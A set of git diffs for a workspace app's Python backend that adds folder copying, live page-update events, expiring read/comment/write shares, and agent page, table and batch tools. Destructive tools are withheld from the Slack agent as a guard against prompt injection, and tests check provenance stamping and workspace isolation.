+        f"SELECT id FROM pages WHERE workspace_id = $1 AND folder_id = $2 AND {_WORKSPACE_PAGE_FILTER}",
+        workspace_id,
+        src_folder_id,
+    )
+    for p in page_rows:
+        src = await get_page(p["id"], workspace_id)
+        if src:
+            await create_page(
+                workspace_id, src["name"], copied_by, folder_id=dst_folder_id,
+                **_page_content_kwargs(src),
+            )
+
+    table_rows = await pool.fetch(
+        "SELECT id, name FROM tables WHERE workspace_id = $1 AND folder_id = $2",
+        workspace_id,
+        src_folder_id,
+    )
+    for t in table_rows:
+        await _copy_table_into(t["id"], workspace_id, copied_by, dst_folder_id, t["name"])
+
+    file_rows = await pool.fetch(
+        "SELECT id FROM files WHERE workspace_id = $1 AND folder_id = $2 AND deleted_at IS NULL",
+        workspace_id,
+        src_folder_id,
+    )
+    for f in file_rows:
+        await copy_file(f["id"], workspace_id, copied_by, target_folder_id=dst_folder_id, name=None)
+
+    sub_rows = await pool.fetch(
+        "SELECT id, name FROM folders WHERE workspace_id = $1 AND parent_folder_id = $2",
+        workspace_id,
+        src_folder_id,
+    )
+    for s in sub_rows:
+        child = await create_folder(workspace_id, s["name"], copied_by, parent_folder_id=dst_folder_id)
+        await _copy_folder_contents(s["id"], child["id"], workspace_id, copied_by)
+
+
+async def copy_folder(
+    folder_id: UUID,
+    workspace_id: UUID,
+    copied_by: UUID,
+    target_parent_id: UUID | None = None,
+) -> dict | None:
+    """Deep-copy a folder (subfolders, pages, tables, files) as 'Copy of <name>'.
+    Inside the copy, descendants keep their original names — only the top folder
+    is renamed. Copying files requires S3 storage to be configured."""
+    src = await get_folder(folder_id)
+    if not src or src["workspace_id"] != workspace_id:
+        return None
+    parent = target_parent_id if target_parent_id is not None else src["parent_folder_id"]
+    if parent is not None:
+        await _assert_no_cycle(folder_id, parent)
+    new_root = await _create_folder_unique(
+        workspace_id, f"Copy of {src['name']}", copied_by, parent
+    )
+    await _copy_folder_contents(folder_id, new_root["id"], workspace_id, copied_by)
+    return new_root
+
+
 # --- Listings ---
 
 

--- a/backend/services/page_events.py
+++ b/backend/services/page_events.py
@@ -1,0 +1,57 @@
+"""In-process pub/sub for live page updates.
+
+When the backend writes a page (an agent edit, a REST save, a copy), open
+viewers should see it without a manual refresh. Subscribers (SSE connections)
+register a queue per workspace; writers publish a small event. This is
+process-local — fine because the web app runs as a single uvicorn process; if
+that ever scales horizontally, swap publish/listen for Postgres LISTEN/NOTIFY.
+"""
+
+from __future__ import annotations
+
+import asyncio
+import logging
+from uuid import UUID
+
+logger = logging.getLogger(__name__)
+
+# workspace_id -> set of subscriber queues. Bounded queues drop events for a
+# stalled client rather than grow without limit; the client refetches on the
+# next event it does receive.
+_subscribers: dict[UUID, set[asyncio.Queue]] = {}
+
+
+def subscribe(workspace_id: UUID) -> asyncio.Queue:
+    queue: asyncio.Queue = asyncio.Queue(maxsize=64)
+    _subscribers.setdefault(workspace_id, set()).add(queue)
+    return queue
+
+
+def unsubscribe(workspace_id: UUID, queue: asyncio.Queue) -> None:
+    subs = _subscribers.get(workspace_id)
+    if not subs:
+        return
+    subs.discard(queue)
+    if not subs:
+        _subscribers.pop(workspace_id, None)
+
+
+def publish_page_update(
+    workspace_id: UUID,
+    page_id: UUID,
+    content_hash: str | None,
+    agent_name: str | None = None,
+) -> None:
+    """Notify subscribers that a page's content changed. Safe to call from sync
+    or async code — it never blocks (full queues drop the event)."""
+    event = {
+        "type": "page.updated",
+        "page_id": str(page_id),
+        "content_hash": content_hash,
+        "agent_name": agent_name,
+    }
+    for queue in list(_subscribers.get(workspace_id, ())):
+        try:
+            queue.put_nowait(event)
+        except asyncio.QueueFull:
+            logger.debug("page_events queue full for workspace %s; dropping event", workspace_id)

--- a/backend/services/permission_service.py
+++ b/backend/services/permission_service.py
@@ -334,9 +334,7 @@ async def check_access(
         return False
 
     # Direct or inherited user share.
-    if user_id is not None and await _user_share_grants(
-        object_type, object_id, user_id, require
-    ):
+    if user_id is not None and await _user_share_grants(object_type, object_id, user_id, require):
         return True
 
     # Read-only access via a public / shared session folder that contains it.

--- a/backend/services/permission_service.py
+++ b/backend/services/permission_service.py
@@ -24,6 +24,10 @@ _WORKSPACE_LOOKUP = {
 
 _CONTENT_TYPES = {"folder", "page", "session", "table", "file"}
 
+# Share permission levels, ordered. A grant satisfies a requirement when its
+# level is >= the required level: read < comment < write.
+_LEVELS = {"read": 0, "comment": 1, "write": 2}
+
 
 def _folder_chain_sql(folder_id_expr: str) -> str:
     return (
@@ -90,6 +94,7 @@ def readable_content_condition(object_type: str, object_alias: str, user_arg: in
             SELECT 1 FROM shares content_share
             WHERE content_share.principal_type = 'user'
               AND content_share.principal_id = ${user_arg}
+              AND (content_share.expires_at IS NULL OR content_share.expires_at > now())
               AND {share_target}
           )
           OR EXISTS (
@@ -203,20 +208,22 @@ async def _object_targets(object_type: str, object_id: UUID) -> list[tuple[str, 
 
 
 async def _user_share_grants(
-    object_type: str, object_id: UUID, user_id: UUID, require_write: bool
+    object_type: str, object_id: UUID, user_id: UUID, require: str
 ) -> bool:
-    """A user share on the object or any ancestor folder."""
+    """A live (unexpired) user share on the object or any ancestor folder that
+    meets the required permission level."""
     pool = get_pool()
     for target_type, target_id in await _object_targets(object_type, object_id):
         row = await pool.fetchrow(
             "SELECT permission FROM shares "
             "WHERE principal_type = 'user' AND principal_id = $1 "
-            "AND object_type = $2 AND object_id = $3",
+            "AND object_type = $2 AND object_id = $3 "
+            "AND (expires_at IS NULL OR expires_at > now())",
             user_id,
             target_type,
             target_id,
         )
-        if row and (not require_write or row["permission"] == "write"):
+        if row and _LEVELS[row["permission"]] >= _LEVELS[require]:
             return True
     return False
 
@@ -262,21 +269,21 @@ async def _cartridge_open(cartridge: dict, user_id: UUID | None) -> bool:
 
 
 async def _session_folder_open(
-    folder: dict, folder_id: UUID, user_id: UUID | None, require_write: bool
+    folder: dict, folder_id: UUID, user_id: UUID | None, require: str
 ) -> bool:
     """Can the user access this session folder? Mirrors _cartridge_open: public
     link, owner, or an explicit user share. Workspace members are granted earlier
     in check_access (the workspace is the trust boundary)."""
     public = folder["public_permission"]
-    if not require_write and public != "none":
+    if require == "read" and public != "none":
         return True
-    if require_write and public == "write":
+    if require == "write" and public == "write":
         return True
     if user_id is None:
         return False
     if folder["owner_user_id"] == user_id:
         return True
-    return await _user_share_grants("session_folder", folder_id, user_id, require_write)
+    return await _user_share_grants("session_folder", folder_id, user_id, require)
 
 
 async def check_access(
@@ -284,8 +291,9 @@ async def check_access(
     object_id: UUID,
     user_id: UUID | None,
     workspace_id: UUID | None = None,
-    require_write: bool = False,
+    require: str = "read",
 ) -> bool:
+    """`require` is the permission level needed: read < comment < write."""
     if workspace_id is None:
         workspace_id = await resolve_workspace_id(object_type, object_id)
 
@@ -306,7 +314,7 @@ async def check_access(
         )
         if not row:
             return False
-        if require_write:
+        if require != "read":
             return row["owner_id"] == user_id
         return await _cartridge_open(dict(row), user_id)
 
@@ -320,19 +328,19 @@ async def check_access(
         )
         if not row:
             return False
-        return await _session_folder_open(dict(row), object_id, user_id, require_write)
+        return await _session_folder_open(dict(row), object_id, user_id, require)
 
     if object_type not in _CONTENT_TYPES:
         return False
 
     # Direct or inherited user share.
     if user_id is not None and await _user_share_grants(
-        object_type, object_id, user_id, require_write
+        object_type, object_id, user_id, require
     ):
         return True
 
     # Read-only access via a public / shared session folder that contains it.
-    if object_type == "session" and not require_write:
+    if object_type == "session" and require == "read":
         pool = get_pool()
         frow = await pool.fetchrow(
             "SELECT sf.id, sf.owner_user_id, sf.public_permission, sf.workspace_permission "
@@ -340,11 +348,11 @@ async def check_access(
             "WHERE s.id = $1",
             object_id,
         )
-        if frow and await _session_folder_open(dict(frow), frow["id"], user_id, False):
+        if frow and await _session_folder_open(dict(frow), frow["id"], user_id, "read"):
             return True
 
     # Read-only access via a cartridge that contains the object.
-    if not require_write:
+    if require == "read":
         for cartridge in await _containing_cartridges(object_type, object_id):
             if await _cartridge_open(cartridge, user_id):
                 return True

--- a/backend/services/prompts.py
+++ b/backend/services/prompts.py
@@ -43,6 +43,16 @@ STASH_TOOL_SET = (
     "read_page",
     "create_page",
     "update_page",
+    "edit_page",
+    "create_folder",
+    "move_page",
+    "rename_page",
+    "delete_page",
+    "create_table",
+    "insert_row",
+    "update_row",
+    "add_column",
+    "delete_row",
     "grep_pages",
     "list_files",
     "read_file",
@@ -61,10 +71,11 @@ STASH_TOOL_SET = (
     "fetch_history",
 )
 
-# Slack agent (talk-to-Stash bot): can create + update cartridges (artifacts),
-# but NOT delete. Slack is an untrusted surface, so the destructive
-# `delete_cartridge` is held back to limit what a prompt-injected message can do.
-SLACK_TOOL_SET = tuple(t for t in STASH_TOOL_SET if t != "delete_cartridge")
+# Slack agent (talk-to-Stash bot): can create + update artifacts, but NOT
+# destroy them. Slack is an untrusted surface, so destructive tools are held
+# back to limit what a prompt-injected message can do.
+SLACK_DESTRUCTIVE_TOOLS = frozenset({"delete_cartridge", "delete_page", "delete_row"})
+SLACK_TOOL_SET = tuple(t for t in STASH_TOOL_SET if t not in SLACK_DESTRUCTIVE_TOOLS)
 
 # Read-only subset for ask-the-workspace and other Q&A surfaces. Drops
 # the write tools so a prompt-injected request can't trigger mutations

--- a/backend/services/prompts.py
+++ b/backend/services/prompts.py
@@ -53,6 +53,8 @@ STASH_TOOL_SET = (
     "update_row",
     "add_column",
     "delete_row",
+    "copy_page",
+    "copy_folder",
     "grep_pages",
     "list_files",
     "read_file",

--- a/backend/services/prompts.py
+++ b/backend/services/prompts.py
@@ -55,6 +55,9 @@ STASH_TOOL_SET = (
     "delete_row",
     "copy_page",
     "copy_folder",
+    "batch_move",
+    "batch_delete",
+    "batch_restore",
     "grep_pages",
     "list_files",
     "read_file",
@@ -76,7 +79,9 @@ STASH_TOOL_SET = (
 # Slack agent (talk-to-Stash bot): can create + update artifacts, but NOT
 # destroy them. Slack is an untrusted surface, so destructive tools are held
 # back to limit what a prompt-injected message can do.
-SLACK_DESTRUCTIVE_TOOLS = frozenset({"delete_cartridge", "delete_page", "delete_row"})
+SLACK_DESTRUCTIVE_TOOLS = frozenset(
+    {"delete_cartridge", "delete_page", "delete_row", "batch_delete", "batch_restore"}
+)
 SLACK_TOOL_SET = tuple(t for t in STASH_TOOL_SET if t not in SLACK_DESTRUCTIVE_TOOLS)
 
 # Read-only subset for ask-the-workspace and other Q&A surfaces. Drops

--- a/backend/services/share_service.py
+++ b/backend/services/share_service.py
@@ -11,6 +11,7 @@ up — see `convert_pending_invites`, called from the register / Auth0 paths.
 
 from __future__ import annotations
 
+from datetime import datetime
 from uuid import UUID
 
 from fastapi import HTTPException
@@ -19,7 +20,7 @@ from ..database import get_pool
 from . import permission_service
 
 _SHAREABLE = {"file", "page", "folder", "session", "session_folder"}
-_PERMISSIONS = {"read", "write"}
+_PERMISSIONS = {"read", "comment", "write"}
 
 
 async def _require_owner(object_type: str, object_id: UUID, user_id: UUID) -> UUID:
@@ -39,11 +40,12 @@ async def share_with_user_by_email(
     email: str,
     permission: str,
     owner_id: UUID,
+    expires_at: datetime | None = None,
 ) -> dict:
     if object_type not in _SHAREABLE:
         raise HTTPException(status_code=400, detail=f"can't share a {object_type}")
     if permission not in _PERMISSIONS:
-        raise HTTPException(status_code=400, detail="permission must be read or write")
+        raise HTTPException(status_code=400, detail="permission must be read, comment, or write")
     workspace_id = await _require_owner(object_type, object_id, owner_id)
 
     pool = get_pool()
@@ -55,10 +57,10 @@ async def share_with_user_by_email(
         await pool.execute(
             """
             INSERT INTO share_invites (workspace_id, object_type, object_id, email,
-                                       permission, created_by)
-            VALUES ($1, $2, $3, lower($4), $5, $6)
+                                       permission, created_by, expires_at)
+            VALUES ($1, $2, $3, lower($4), $5, $6, $7)
             ON CONFLICT (object_type, object_id, email)
-            DO UPDATE SET permission = EXCLUDED.permission
+            DO UPDATE SET permission = EXCLUDED.permission, expires_at = EXCLUDED.expires_at
             """,
             workspace_id,
             object_type,
@@ -66,6 +68,7 @@ async def share_with_user_by_email(
             email,
             permission,
             owner_id,
+            expires_at,
         )
         return {"pending": True, "email": email.lower()}
     if user["id"] == owner_id:
@@ -73,10 +76,10 @@ async def share_with_user_by_email(
     row = await pool.fetchrow(
         """
         INSERT INTO shares (workspace_id, object_type, object_id, principal_type,
-                            principal_id, permission, created_by)
-        VALUES ($1, $2, $3, 'user', $4, $5, $6)
+                            principal_id, permission, created_by, expires_at)
+        VALUES ($1, $2, $3, 'user', $4, $5, $6, $7)
         ON CONFLICT (object_type, object_id, principal_type, principal_id)
-        DO UPDATE SET permission = EXCLUDED.permission
+        DO UPDATE SET permission = EXCLUDED.permission, expires_at = EXCLUDED.expires_at
         RETURNING id
         """,
         workspace_id,
@@ -85,6 +88,7 @@ async def share_with_user_by_email(
         user["id"],
         permission,
         owner_id,
+        expires_at,
     )
     return {"id": str(row["id"]), "principal_type": "user", "principal_id": str(user["id"])}
 
@@ -144,7 +148,8 @@ async def list_object_shares(object_type: str, object_id: UUID, owner_id: UUID) 
     await _require_owner(object_type, object_id, owner_id)
     rows = await get_pool().fetch(
         """
-        SELECT s.principal_type, s.principal_id, s.permission,
+        SELECT s.principal_type, s.principal_id, s.permission, s.expires_at,
+               (s.expires_at IS NOT NULL AND s.expires_at <= now()) AS expired,
                u.name AS user_name, u.display_name AS user_display, u.email AS user_email,
                c.title AS cartridge_title
         FROM shares s
@@ -156,6 +161,7 @@ async def list_object_shares(object_type: str, object_id: UUID, owner_id: UUID) 
         object_type,
         object_id,
     )
+    # Owner view keeps expired rows (flagged) so the owner can renew/revoke.
     shares = [
         {
             "principal_type": r["principal_type"],
@@ -164,12 +170,15 @@ async def list_object_shares(object_type: str, object_id: UUID, owner_id: UUID) 
             "label": r["user_display"] or r["user_name"] or r["cartridge_title"] or "",
             "email": r["user_email"],
             "pending": False,
+            "expires_at": r["expires_at"].isoformat() if r["expires_at"] else None,
+            "expired": r["expired"],
         }
         for r in rows
     ]
     # Pending invites (shared to an email with no user yet) show as "invited".
     invites = await get_pool().fetch(
-        "SELECT email, permission FROM share_invites "
+        "SELECT email, permission, expires_at, "
+        "(expires_at IS NOT NULL AND expires_at <= now()) AS expired FROM share_invites "
         "WHERE object_type = $1 AND object_id = $2 ORDER BY created_at",
         object_type,
         object_id,
@@ -182,6 +191,8 @@ async def list_object_shares(object_type: str, object_id: UUID, owner_id: UUID) 
             "label": inv["email"],
             "email": inv["email"],
             "pending": True,
+            "expires_at": inv["expires_at"].isoformat() if inv["expires_at"] else None,
+            "expired": inv["expired"],
         }
         for inv in invites
     )
@@ -213,6 +224,7 @@ async def list_shared_with_user(user_id: UUID) -> list[dict]:
         JOIN workspaces w ON w.id = s.workspace_id
         LEFT JOIN users u ON u.id = s.created_by
         WHERE s.principal_type = 'user' AND s.principal_id = $1
+          AND (s.expires_at IS NULL OR s.expires_at > now())
         ORDER BY w.name, s.object_type, name
         """,
         user_id,

--- a/backend/services/tool_loop.py
+++ b/backend/services/tool_loop.py
@@ -28,7 +28,13 @@ from uuid import UUID
 from anthropic import AsyncAnthropic
 
 from ..config import settings
-from .agent_runtime import _TOOLS_BY_NAME, _user_ctx, _workspace_ctx
+from .agent_runtime import (
+    _TOOLS_BY_NAME,
+    _agent_name_ctx,
+    _session_ctx,
+    _user_ctx,
+    _workspace_ctx,
+)
 from .llm import ModelTier, _model_for
 
 logger = logging.getLogger(__name__)
@@ -81,6 +87,8 @@ async def stream_tool_loop(
     user_id: UUID | None = None,
     tool_set: tuple[str, ...],
     max_turns: int = 8,
+    session_id: str | None = None,
+    agent_name: str | None = None,
 ) -> AsyncIterator[dict]:
     """Run an Anthropic tool-use loop, yielding structured events (dicts):
     `text` / `tool` / `tool_result` / `end`. The caller is responsible for
@@ -106,6 +114,8 @@ async def stream_tool_loop(
 
     workspace_token = _workspace_ctx.set(workspace_id)
     user_token = _user_ctx.set(user_id)
+    session_token = _session_ctx.set(session_id)
+    agent_name_token = _agent_name_ctx.set(agent_name)
     try:
         for turn_idx in range(max_turns):
             assistant_blocks: list[dict] = []
@@ -233,6 +243,8 @@ async def stream_tool_loop(
 
             messages.append({"role": "user", "content": tool_results})
     finally:
+        _agent_name_ctx.reset(agent_name_token)
+        _session_ctx.reset(session_token)
         _user_ctx.reset(user_token)
         _workspace_ctx.reset(workspace_token)
 

--- a/backend/tests/test_agent_runtime.py
+++ b/backend/tests/test_agent_runtime.py
@@ -208,6 +208,62 @@ def test_destructive_tools_withheld_from_untrusted_surfaces():
 
 
 @pytest.mark.asyncio
+async def test_edit_provenance_stamped_for_agent_and_null_for_human(workspace: UUID, _db_pool):
+    """Agent writes stamp the page + log who/which session; a plain service
+    (human/REST) write logs an edit row but leaves the agent/session NULL."""
+    from backend.services import files_tree_service
+
+    user_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)
+
+    # Human/REST path: no agent context → NULL stamp, but still logged.
+    human = await files_tree_service.create_page(
+        workspace_id=workspace, name="Human", created_by=user_id, content="hi"
+    )
+    h_cols = await _db_pool.fetchrow(
+        "SELECT last_edit_session_id, last_edit_agent_name FROM pages WHERE id = $1", human["id"]
+    )
+    assert h_cols["last_edit_agent_name"] is None and h_cols["last_edit_session_id"] is None
+    h_log = await _db_pool.fetchrow(
+        "SELECT op, agent_name FROM page_edits WHERE page_id = $1", human["id"]
+    )
+    assert h_log["op"] == "create" and h_log["agent_name"] is None
+
+    # Agent path: session + agent name bound in context → stamped + logged.
+    session_token = agent_runtime._session_ctx.set("chat-123")
+    agent_token = agent_runtime._agent_name_ctx.set("Stash Agent")
+    workspace_token = agent_runtime._workspace_ctx.set(workspace)
+    user_token = agent_runtime._user_ctx.set(user_id)
+    try:
+        created = json.loads(
+            (
+                await agent_runtime._create_page.handler({"name": "Agent doc", "content": "a b"})
+            )["content"][0]["text"]
+        )
+        await agent_runtime._edit_page.handler(
+            {"page_id": created["id"], "old_string": "a b", "new_string": "a c"}
+        )
+    finally:
+        agent_runtime._user_ctx.reset(user_token)
+        agent_runtime._workspace_ctx.reset(workspace_token)
+        agent_runtime._agent_name_ctx.reset(agent_token)
+        agent_runtime._session_ctx.reset(session_token)
+
+    page_id = UUID(created["id"])
+    cols = await _db_pool.fetchrow(
+        "SELECT last_edit_session_id, last_edit_agent_name FROM pages WHERE id = $1", page_id
+    )
+    assert cols["last_edit_session_id"] == "chat-123"
+    assert cols["last_edit_agent_name"] == "Stash Agent"
+    ops = [
+        r["op"]
+        for r in await _db_pool.fetch(
+            "SELECT op FROM page_edits WHERE page_id = $1 ORDER BY created_at", page_id
+        )
+    ]
+    assert ops == ["create", "edit"]  # the edit_page call logged op='edit'
+
+
+@pytest.mark.asyncio
 async def test_edit_page_surgical_edits(workspace: UUID, _db_pool):
     """edit_page does a unique str-replace / append on the active body, and fails
     loud (writing nothing) when the anchor isn't unique."""

--- a/backend/tests/test_agent_runtime.py
+++ b/backend/tests/test_agent_runtime.py
@@ -235,9 +235,9 @@ async def test_edit_provenance_stamped_for_agent_and_null_for_human(workspace: U
     user_token = agent_runtime._user_ctx.set(user_id)
     try:
         created = json.loads(
-            (
-                await agent_runtime._create_page.handler({"name": "Agent doc", "content": "a b"})
-            )["content"][0]["text"]
+            (await agent_runtime._create_page.handler({"name": "Agent doc", "content": "a b"}))[
+                "content"
+            ][0]["text"]
         )
         await agent_runtime._edit_page.handler(
             {"page_id": created["id"], "old_string": "a b", "new_string": "a c"}
@@ -309,9 +309,7 @@ async def test_edit_page_surgical_edits(workspace: UUID, _db_pool):
         agent_runtime._user_ctx.reset(user_token)
         agent_runtime._workspace_ctx.reset(workspace_token)
 
-    md_body = await _db_pool.fetchval(
-        "SELECT content_markdown FROM pages WHERE id = $1", md["id"]
-    )
+    md_body = await _db_pool.fetchval("SELECT content_markdown FROM pages WHERE id = $1", md["id"])
     html_body = await _db_pool.fetchval("SELECT content_html FROM pages WHERE id = $1", html["id"])
     assert md_body == "alpha BETA gamma delta"
     assert html_body == "<p>two</p>"
@@ -453,11 +451,9 @@ async def test_table_tools_reject_cross_workspace(workspace: UUID, _db_pool):
     user_token = agent_runtime._user_ctx.set(user_id)
     try:
         result = json.loads(
-            (
-                await agent_runtime._insert_row.handler(
-                    {"table_id": str(other_table), "data": {}}
-                )
-            )["content"][0]["text"]
+            (await agent_runtime._insert_row.handler({"table_id": str(other_table), "data": {}}))[
+                "content"
+            ][0]["text"]
         )
     finally:
         agent_runtime._user_ctx.reset(user_token)

--- a/backend/tests/test_agent_runtime.py
+++ b/backend/tests/test_agent_runtime.py
@@ -184,6 +184,232 @@ async def test_create_and_update_page_round_trip(workspace: UUID, _db_pool):
     assert "Hello again" in json.loads(read_back["content"][0]["text"])["content"]
 
 
+def test_destructive_tools_withheld_from_untrusted_surfaces():
+    """The Slack surface is untrusted (prompt-injectable), so destructive tools
+    must never reach it; the ask surface must stay read-only."""
+    for name in prompts.SLACK_DESTRUCTIVE_TOOLS:
+        assert name in prompts.STASH_TOOL_SET
+        assert name not in prompts.SLACK_TOOL_SET
+    write_tools = (
+        "create_page",
+        "update_page",
+        "create_folder",
+        "move_page",
+        "rename_page",
+        "delete_page",
+        "create_table",
+        "insert_row",
+        "update_row",
+        "add_column",
+        "delete_row",
+    )
+    for name in write_tools:
+        assert name not in prompts.ASK_TOOL_SET
+
+
+@pytest.mark.asyncio
+async def test_edit_page_surgical_edits(workspace: UUID, _db_pool):
+    """edit_page does a unique str-replace / append on the active body, and fails
+    loud (writing nothing) when the anchor isn't unique."""
+    from backend.services import files_tree_service
+
+    user_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)
+
+    md = await files_tree_service.create_page(
+        workspace_id=workspace, name="Doc", created_by=user_id, content="alpha beta gamma"
+    )
+    html = await files_tree_service.create_page(
+        workspace_id=workspace,
+        name="Page",
+        created_by=user_id,
+        content_type="html",
+        content_html="<p>one</p>",
+    )
+
+    workspace_token = agent_runtime._workspace_ctx.set(workspace)
+    user_token = agent_runtime._user_ctx.set(user_id)
+    try:
+        # Unique replace on markdown.
+        await agent_runtime._edit_page.handler(
+            {"page_id": str(md["id"]), "old_string": "beta", "new_string": "BETA"}
+        )
+        # Append on markdown.
+        await agent_runtime._edit_page.handler(
+            {"page_id": str(md["id"]), "new_string": " delta", "mode": "append"}
+        )
+        # Unique replace on the html body.
+        await agent_runtime._edit_page.handler(
+            {"page_id": str(html["id"]), "old_string": "<p>one</p>", "new_string": "<p>two</p>"}
+        )
+        # Zero matches → fail loud, no write.
+        zero = json.loads(
+            (
+                await agent_runtime._edit_page.handler(
+                    {"page_id": str(md["id"]), "old_string": "nope", "new_string": "x"}
+                )
+            )["content"][0]["text"]
+        )
+    finally:
+        agent_runtime._user_ctx.reset(user_token)
+        agent_runtime._workspace_ctx.reset(workspace_token)
+
+    md_body = await _db_pool.fetchval(
+        "SELECT content_markdown FROM pages WHERE id = $1", md["id"]
+    )
+    html_body = await _db_pool.fetchval("SELECT content_html FROM pages WHERE id = $1", html["id"])
+    assert md_body == "alpha BETA gamma delta"
+    assert html_body == "<p>two</p>"
+    assert zero["error"] == "no-unique-match"
+
+
+@pytest.mark.asyncio
+async def test_edit_page_multi_match_writes_nothing(workspace: UUID, _db_pool):
+    """A >1 match must not partially write — the body is untouched."""
+    from backend.services import files_tree_service
+
+    user_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)
+    page = await files_tree_service.create_page(
+        workspace_id=workspace, name="Dup", created_by=user_id, content="x x x"
+    )
+
+    with pytest.raises(files_tree_service.EditMatchError):
+        await files_tree_service.edit_page(
+            page["id"], workspace, user_id, old_string="x", new_string="y"
+        )
+    body = await _db_pool.fetchval("SELECT content_markdown FROM pages WHERE id = $1", page["id"])
+    assert body == "x x x"
+
+
+@pytest.mark.asyncio
+async def test_tree_mutation_tools_round_trip(workspace: UUID, _db_pool):
+    """create_folder + the page move/rename/delete tools let the agent organize
+    the workspace, all bound to the active workspace context."""
+    user_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)
+
+    workspace_token = agent_runtime._workspace_ctx.set(workspace)
+    user_token = agent_runtime._user_ctx.set(user_id)
+    try:
+        folder = json.loads(
+            (await agent_runtime._create_folder.handler({"name": "Specs"}))["content"][0]["text"]
+        )
+        page = json.loads(
+            (
+                await agent_runtime._create_page.handler(
+                    {"name": "Draft", "content": "# Draft", "folder_id": folder["id"]}
+                )
+            )["content"][0]["text"]
+        )
+        await agent_runtime._rename_page.handler({"page_id": page["id"], "name": "Final"})
+        await agent_runtime._move_page.handler({"page_id": page["id"], "move_to_root": True})
+        deleted = json.loads(
+            (await agent_runtime._delete_page.handler({"page_id": page["id"]}))["content"][0][
+                "text"
+            ]
+        )
+    finally:
+        agent_runtime._user_ctx.reset(user_token)
+        agent_runtime._workspace_ctx.reset(workspace_token)
+
+    assert deleted == {"deleted": True, "page_id": page["id"]}
+    stored = await _db_pool.fetchrow(
+        "SELECT name, folder_id, deleted_at FROM pages WHERE id = $1", UUID(page["id"])
+    )
+    assert stored["name"] == "Final"  # rename took
+    assert stored["folder_id"] is None  # moved to root
+    assert stored["deleted_at"] is not None  # soft-deleted
+
+
+@pytest.mark.asyncio
+async def test_table_mutation_tools_round_trip(workspace: UUID, _db_pool):
+    """create_table + row/column tools wrap table_service, guarded so an agent
+    can only touch tables in its own workspace."""
+    user_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)
+
+    workspace_token = agent_runtime._workspace_ctx.set(workspace)
+    user_token = agent_runtime._user_ctx.set(user_id)
+    try:
+        table = json.loads(
+            (
+                await agent_runtime._create_table.handler(
+                    {"name": "Leads", "columns": [{"name": "Company", "type": "text"}]}
+                )
+            )["content"][0]["text"]
+        )
+        row = json.loads(
+            (
+                await agent_runtime._insert_row.handler(
+                    {"table_id": table["id"], "data": {"Company": "Acme"}}
+                )
+            )["content"][0]["text"]
+        )
+        await agent_runtime._add_column.handler(
+            {"table_id": table["id"], "column": {"name": "Stage", "type": "text"}}
+        )
+        await agent_runtime._update_row.handler(
+            {"table_id": table["id"], "row_id": row["id"], "data": {"Stage": "Won"}}
+        )
+        stored_data = await _db_pool.fetchval(
+            "SELECT data FROM table_rows WHERE id = $1", UUID(row["id"])
+        )
+        deleted = json.loads(
+            (
+                await agent_runtime._delete_row.handler(
+                    {"table_id": table["id"], "row_id": row["id"]}
+                )
+            )["content"][0]["text"]
+        )
+    finally:
+        agent_runtime._user_ctx.reset(user_token)
+        agent_runtime._workspace_ctx.reset(workspace_token)
+
+    assert "Acme" in json.dumps(stored_data)
+    assert "Won" in json.dumps(stored_data)
+    assert deleted == {"deleted": True, "row_id": row["id"]}
+    remaining = await _db_pool.fetchval(
+        "SELECT count(*) FROM table_rows WHERE id = $1", UUID(row["id"])
+    )
+    assert remaining == 0
+
+
+@pytest.mark.asyncio
+async def test_table_tools_reject_cross_workspace(workspace: UUID, _db_pool):
+    """A table id from another workspace must be invisible to the agent's
+    write tools — the workspace guard returns 'table not found'."""
+    user_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)
+    other_ws = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO workspaces (id, name, creator_id, invite_code) VALUES ($1, $2, $3, $4)",
+        other_ws,
+        f"ws_{other_ws.hex[:6]}",
+        user_id,
+        other_ws.hex[:12],
+    )
+    other_table = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO tables (id, workspace_id, name, description, columns, created_by, updated_by) "
+        "VALUES ($1, $2, 'Secret', '', '[]'::jsonb, $3, $3)",
+        other_table,
+        other_ws,
+        user_id,
+    )
+
+    workspace_token = agent_runtime._workspace_ctx.set(workspace)
+    user_token = agent_runtime._user_ctx.set(user_id)
+    try:
+        result = json.loads(
+            (
+                await agent_runtime._insert_row.handler(
+                    {"table_id": str(other_table), "data": {}}
+                )
+            )["content"][0]["text"]
+        )
+    finally:
+        agent_runtime._user_ctx.reset(user_token)
+        agent_runtime._workspace_ctx.reset(workspace_token)
+
+    assert result == {"error": "table not found"}
+
+
 @pytest.mark.asyncio
 async def test_external_cartridge_is_workspace_fork(workspace: UUID, _db_pool):
     owner_id = await _db_pool.fetchval("SELECT creator_id FROM workspaces WHERE id = $1", workspace)

--- a/backend/tests/test_batch.py
+++ b/backend/tests/test_batch.py
@@ -134,7 +134,10 @@ async def test_batch_move_rejects_cross_workspace_item(workspace, _db_pool):
         workspace_id=other_ws, name="Other", created_by=user_id
     )
     result = await batch_service.batch_move(
-        ws_id, user_id, [{"object_type": "page", "object_id": str(other_page["id"])}], move_to_root=True
+        ws_id,
+        user_id,
+        [{"object_type": "page", "object_id": str(other_page["id"])}],
+        move_to_root=True,
     )
     assert not result["succeeded"]
     assert result["errors"][0]["reason"] == "not found"

--- a/backend/tests/test_batch.py
+++ b/backend/tests/test_batch.py
@@ -1,0 +1,140 @@
+"""Batch move/delete/restore — best-effort semantics: good items apply, bad
+ones come back as per-item errors without blocking the rest."""
+
+from __future__ import annotations
+
+from uuid import uuid4
+
+import pytest
+import pytest_asyncio
+
+from backend.services import batch_service, files_tree_service
+
+
+@pytest_asyncio.fixture
+async def workspace(_db_pool):
+    user_id = uuid4()
+    ws_id = uuid4()
+    await _db_pool.execute(
+        "INSERT INTO users (id, name, display_name) VALUES ($1, $2, $2)",
+        user_id,
+        f"u_{user_id.hex[:6]}",
+    )
+    await _db_pool.execute(
+        "INSERT INTO workspaces (id, name, creator_id, invite_code) VALUES ($1, $2, $3, $4)",
+        ws_id,
+        f"ws_{ws_id.hex[:6]}",
+        user_id,
+        ws_id.hex[:12],
+    )
+    await _db_pool.execute(
